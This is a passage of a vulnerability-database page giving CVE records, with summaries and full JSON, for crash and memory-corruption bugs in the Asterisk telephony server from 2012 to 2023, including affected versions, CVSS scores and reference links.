	https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh	x_refsource_CONFIRM
	https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa	x_refsource_MISC
	https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html

Impacted products

	Vendor	Product	Version
	asterisk	asterisk	Version: <= 18.20.0 Version: >= 19.0.0, <= 20.5.0 Version: = 21.0.0 Version: <= 18.9-cert5

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T17:16:30.273Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
          },
          {
            "name": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "asterisk",
          "vendor": "asterisk",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 18.20.0"
            },
            {
              "status": "affected",
              "version": "\u003e= 19.0.0, \u003c= 20.5.0"
            },
            {
              "status": "affected",
              "version": "= 21.0.0"
            },
            {
              "status": "affected",
              "version": "\u003c= 18.9-cert5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the \u0027update\u0027 functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-120",
              "description": "CWE-120: Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-12-29T00:06:20.393Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
        },
        {
          "name": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
        }
      ],
      "source": {
        "advisory": "GHSA-98rc-4j27-74hh",
        "discovery": "UNKNOWN"
      },
      "title": "Asterisk\u0027s PJSIP_HEADER dialplan function can overwrite memory/cause crash when using \u0027update\u0027"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2023-37457",
    "datePublished": "2023-12-14T19:43:30.945Z",
    "dateReserved": "2023-07-06T13:01:36.996Z",
    "dateUpdated": "2025-02-13T17:01:26.636Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2018-7284

Vulnerability from cvelistv5

Published

2018-02-22 00:00

Modified

2024-08-05 06:24

Severity ?

Summary

A Buffer Overflow issue was discovered in Asterisk through 13.19.1, 14.x through 14.7.5, and 15.x through 15.2.1, and Certified Asterisk through 13.18-cert2. When processing a SUBSCRIBE request, the res_pjsip_pubsub module stores the accepted formats present in the Accept headers of the request. This code did not limit the number of headers it processed, despite having a fixed limit of 32. If more than 32 Accept headers were present, the code would write outside of its memory and cause a crash.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2018-004.html	x_refsource_CONFIRM
	https://www.exploit-db.com/exploits/44184/	exploit, x_refsource_EXPLOIT-DB
	https://www.debian.org/security/2018/dsa-4320	vendor-advisory, x_refsource_DEBIAN
	http://www.securityfocus.com/bid/103151	vdb-entry, x_refsource_BID
	http://www.securitytracker.com/id/1040416	vdb-entry, x_refsource_SECTRACK

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T06:24:11.866Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2018-004.html"
          },
          {
            "name": "44184",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/44184/"
          },
          {
            "name": "DSA-4320",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2018/dsa-4320"
          },
          {
            "name": "103151",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/103151"
          },
          {
            "name": "1040416",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1040416"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2018-02-21T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A Buffer Overflow issue was discovered in Asterisk through 13.19.1, 14.x through 14.7.5, and 15.x through 15.2.1, and Certified Asterisk through 13.18-cert2. When processing a SUBSCRIBE request, the res_pjsip_pubsub module stores the accepted formats present in the Accept headers of the request. This code did not limit the number of headers it processed, despite having a fixed limit of 32. If more than 32 Accept headers were present, the code would write outside of its memory and cause a crash."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-17T09:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2018-004.html"
        },
        {
          "name": "44184",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/44184/"
        },
        {
          "name": "DSA-4320",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2018/dsa-4320"
        },
        {
          "name": "103151",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/103151"
        },
        {
          "name": "1040416",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1040416"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2018-7284",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A Buffer Overflow issue was discovered in Asterisk through 13.19.1, 14.x through 14.7.5, and 15.x through 15.2.1, and Certified Asterisk through 13.18-cert2. When processing a SUBSCRIBE request, the res_pjsip_pubsub module stores the accepted formats present in the Accept headers of the request. This code did not limit the number of headers it processed, despite having a fixed limit of 32. If more than 32 Accept headers were present, the code would write outside of its memory and cause a crash."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2018-004.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2018-004.html"
            },
            {
              "name": "44184",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/44184/"
            },
            {
              "name": "DSA-4320",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2018/dsa-4320"
            },
            {
              "name": "103151",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/103151"
            },
            {
              "name": "1040416",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1040416"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2018-7284",
    "datePublished": "2018-02-22T00:00:00",
    "dateReserved": "2018-02-21T00:00:00",
    "dateUpdated": "2024-08-05T06:24:11.866Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2018-7286

Vulnerability from cvelistv5

Published

2018-02-22 00:00

Modified

2024-08-05 06:24

Severity ?

Summary

An issue was discovered in Asterisk through 13.19.1, 14.x through 14.7.5, and 15.x through 15.2.1, and Certified Asterisk through 13.18-cert2. res_pjsip allows remote authenticated users to crash Asterisk (segmentation fault) by sending a number of SIP INVITE messages on a TCP or TLS connection and then suddenly closing the connection.

References

▼	URL	Tags
	https://www.debian.org/security/2018/dsa-4320	vendor-advisory, x_refsource_DEBIAN
	https://issues.asterisk.org/jira/browse/ASTERISK-27618	x_refsource_CONFIRM
	http://downloads.asterisk.org/pub/security/AST-2018-005.html	x_refsource_CONFIRM
	https://www.exploit-db.com/exploits/44181/	exploit, x_refsource_EXPLOIT-DB
	http://www.securitytracker.com/id/1040417	vdb-entry, x_refsource_SECTRACK
	http://www.securityfocus.com/bid/103129	vdb-entry, x_refsource_BID

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T06:24:11.758Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "DSA-4320",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2018/dsa-4320"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27618"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2018-005.html"
          },
          {
            "name": "44181",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/44181/"
          },
          {
            "name": "1040417",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1040417"
          },
          {
            "name": "103129",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/103129"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2018-02-21T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in Asterisk through 13.19.1, 14.x through 14.7.5, and 15.x through 15.2.1, and Certified Asterisk through 13.18-cert2. res_pjsip allows remote authenticated users to crash Asterisk (segmentation fault) by sending a number of SIP INVITE messages on a TCP or TLS connection and then suddenly closing the connection."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-17T09:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "DSA-4320",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2018/dsa-4320"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27618"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2018-005.html"
        },
        {
          "name": "44181",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/44181/"
        },
        {
          "name": "1040417",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1040417"
        },
        {
          "name": "103129",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/103129"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2018-7286",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in Asterisk through 13.19.1, 14.x through 14.7.5, and 15.x through 15.2.1, and Certified Asterisk through 13.18-cert2. res_pjsip allows remote authenticated users to crash Asterisk (segmentation fault) by sending a number of SIP INVITE messages on a TCP or TLS connection and then suddenly closing the connection."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "DSA-4320",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2018/dsa-4320"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-27618",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27618"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2018-005.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2018-005.html"
            },
            {
              "name": "44181",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/44181/"
            },
            {
              "name": "1040417",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1040417"
            },
            {
              "name": "103129",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/103129"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2018-7286",
    "datePublished": "2018-02-22T00:00:00",
    "dateReserved": "2018-02-21T00:00:00",
    "dateUpdated": "2024-08-05T06:24:11.758Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2019-18976

Vulnerability from cvelistv5

Published

2019-11-22 16:59

Modified

2024-08-05 02:02

Severity ?

Summary

An issue was discovered in res_pjsip_t38.c in Sangoma Asterisk through 13.x and Certified Asterisk through 13.21-x. If it receives a re-invite initiating T.38 faxing and has a port of 0 and no c line in the SDP, a NULL pointer dereference and crash will occur. This is different from CVE-2019-18940.

References

▼	URL	Tags
	https://www.asterisk.org/downloads/security-advisories	x_refsource_MISC
	https://www.cybersecurity-help.cz/vdb/SB2019112218?affChecked=1	x_refsource_MISC
	https://packetstormsecurity.com/files/155436/Asterisk-Project-Security-Advisory-AST-2019-008.html	x_refsource_MISC
	https://seclists.org/fulldisclosure/2019/Nov/20	x_refsource_MISC
	http://downloads.asterisk.org/pub/security/AST-2019-008.html	x_refsource_CONFIRM
	https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html	mailing-list, x_refsource_MLIST

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T02:02:39.983Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.asterisk.org/downloads/security-advisories"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.cybersecurity-help.cz/vdb/SB2019112218?affChecked=1"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://packetstormsecurity.com/files/155436/Asterisk-Project-Security-Advisory-AST-2019-008.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://seclists.org/fulldisclosure/2019/Nov/20"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2019-008.html"
          },
          {
            "name": "[debian-lts-announce] 20220403 [SECURITY] [DLA 2969-1] asterisk security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in res_pjsip_t38.c in Sangoma Asterisk through 13.x and Certified Asterisk through 13.21-x. If it receives a re-invite initiating T.38 faxing and has a port of 0 and no c line in the SDP, a NULL pointer dereference and crash will occur. This is different from CVE-2019-18940."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-04-03T07:06:13",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.asterisk.org/downloads/security-advisories"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.cybersecurity-help.cz/vdb/SB2019112218?affChecked=1"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://packetstormsecurity.com/files/155436/Asterisk-Project-Security-Advisory-AST-2019-008.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://seclists.org/fulldisclosure/2019/Nov/20"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2019-008.html"
        },
        {
          "name": "[debian-lts-announce] 20220403 [SECURITY] [DLA 2969-1] asterisk security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2019-18976",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in res_pjsip_t38.c in Sangoma Asterisk through 13.x and Certified Asterisk through 13.21-x. If it receives a re-invite initiating T.38 faxing and has a port of 0 and no c line in the SDP, a NULL pointer dereference and crash will occur. This is different from CVE-2019-18940."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.asterisk.org/downloads/security-advisories",
              "refsource": "MISC",
              "url": "https://www.asterisk.org/downloads/security-advisories"
            },
            {
              "name": "https://www.cybersecurity-help.cz/vdb/SB2019112218?affChecked=1",
              "refsource": "MISC",
              "url": "https://www.cybersecurity-help.cz/vdb/SB2019112218?affChecked=1"
            },
            {
              "name": "https://packetstormsecurity.com/files/155436/Asterisk-Project-Security-Advisory-AST-2019-008.html",
              "refsource": "MISC",
              "url": "https://packetstormsecurity.com/files/155436/Asterisk-Project-Security-Advisory-AST-2019-008.html"
            },
            {
              "name": "https://seclists.org/fulldisclosure/2019/Nov/20",
              "refsource": "MISC",
              "url": "https://seclists.org/fulldisclosure/2019/Nov/20"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2019-008.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2019-008.html"
            },
            {
              "name": "[debian-lts-announce] 20220403 [SECURITY] [DLA 2969-1] asterisk security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2019-18976",
    "datePublished": "2019-11-22T16:59:19",
    "dateReserved": "2019-11-14T00:00:00",
    "dateUpdated": "2024-08-05T02:02:39.983Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2012-3812

Vulnerability from cvelistv5

Published

2012-07-09 22:00

Modified

2024-08-06 20:21

Severity ?

Summary

Double free vulnerability in apps/app_voicemail.c in Asterisk Open Source 1.8.x before 1.8.13.1 and 10.x before 10.5.2, Certified Asterisk 1.8.11-certx before 1.8.11-cert4, and Asterisk Digiumphones 10.x.x-digiumphones before 10.5.2-digiumphones allows remote authenticated users to cause a denial of service (daemon crash) by establishing multiple voicemail sessions and accessing both the Urgent mailbox and the INBOX mailbox.

References

▼	URL	Tags
	http://secunia.com/advisories/50687	third-party-advisory, x_refsource_SECUNIA
	http://secunia.com/advisories/50756	third-party-advisory, x_refsource_SECUNIA
	http://www.securityfocus.com/bid/54317	vdb-entry, x_refsource_BID
	http://www.debian.org/security/2012/dsa-2550	vendor-advisory, x_refsource_DEBIAN
	https://issues.asterisk.org/jira/browse/ASTERISK-20052	x_refsource_CONFIRM
	http://downloads.asterisk.org/pub/security/AST-2012-011.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T20:21:02.907Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "50687",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/50687"
          },
          {
            "name": "50756",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/50756"
          },
          {
            "name": "54317",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/54317"
          },
          {
            "name": "DSA-2550",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2012/dsa-2550"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-20052"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2012-011.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2012-06-27T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Double free vulnerability in apps/app_voicemail.c in Asterisk Open Source 1.8.x before 1.8.13.1 and 10.x before 10.5.2, Certified Asterisk 1.8.11-certx before 1.8.11-cert4, and Asterisk Digiumphones 10.x.x-digiumphones before 10.5.2-digiumphones allows remote authenticated users to cause a denial of service (daemon crash) by establishing multiple voicemail sessions and accessing both the Urgent mailbox and the INBOX mailbox."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2012-10-31T09:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "50687",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/50687"
        },
        {
          "name": "50756",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/50756"
        },
        {
          "name": "54317",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/54317"
        },
        {
          "name": "DSA-2550",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2012/dsa-2550"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-20052"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2012-011.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2012-3812",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Double free vulnerability in apps/app_voicemail.c in Asterisk Open Source 1.8.x before 1.8.13.1 and 10.x before 10.5.2, Certified Asterisk 1.8.11-certx before 1.8.11-cert4, and Asterisk Digiumphones 10.x.x-digiumphones before 10.5.2-digiumphones allows remote authenticated users to cause a denial of service (daemon crash) by establishing multiple voicemail sessions and accessing both the Urgent mailbox and the INBOX mailbox."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "50687",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/50687"
            },
            {
              "name": "50756",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/50756"
            },
            {
              "name": "54317",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/54317"
            },
            {
              "name": "DSA-2550",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2012/dsa-2550"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-20052",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-20052"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2012-011.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2012-011.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2012-3812",
